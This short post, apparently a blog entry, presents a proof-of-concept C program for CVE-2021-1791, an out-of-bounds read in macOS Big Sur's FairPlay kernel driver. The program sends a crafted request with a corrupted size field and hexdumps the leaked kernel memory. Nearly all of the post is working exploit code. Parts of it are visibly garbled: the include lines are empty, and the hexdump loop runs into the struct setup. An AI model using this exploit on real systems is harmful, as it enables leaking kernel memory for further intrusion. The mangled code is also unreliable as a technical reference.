CVE-2021-1791 Fairplay OOB Read POC

# CVE-2021-1791 Fairplay OOB Read POC

越界读取问题，导致内存泄漏.

影响版本：macOS Big Sur 11.0.1

fairplay_iokit_uc_run_versioned.c:

“`c
#include
#include
#include
#include
#include
#include

void hexdump(void *ptr, int buflen) {
unsigned char *buf = (unsigned char*)ptr;
int i, j;
for (i=0; ifield_0 = 0x00000008;
sIn->field_4 = 0x525e5ba4;
sIn->field_8 = 0x34788a7a;
sIn->size = 0x70;
memcpy(sIn->sec1,sec1,20);
memcpy(sIn->sec2,sec2,sIn->size);
//magic
sIn->size = 0xdeadbeef;

if(fairplay_run_versioned(conn,sIn,sOut)){
return -1;
}

printf(“outSec1 : \n”);
hexdump(sOut->sec1,20);

printf(“outSec2 : \n”);
hexdump(sOut->sec2,sOut->size);

printf(“[+] fairplay success, size = %d, ret = %d\n”,sOut->size,sOut->fp_ret);
}
“`

ref：

* https://support.apple.com/en-us/HT212147
* https://gist.github.com/pwn0rz/e34ab9f6e46956621a9d4f98cf222320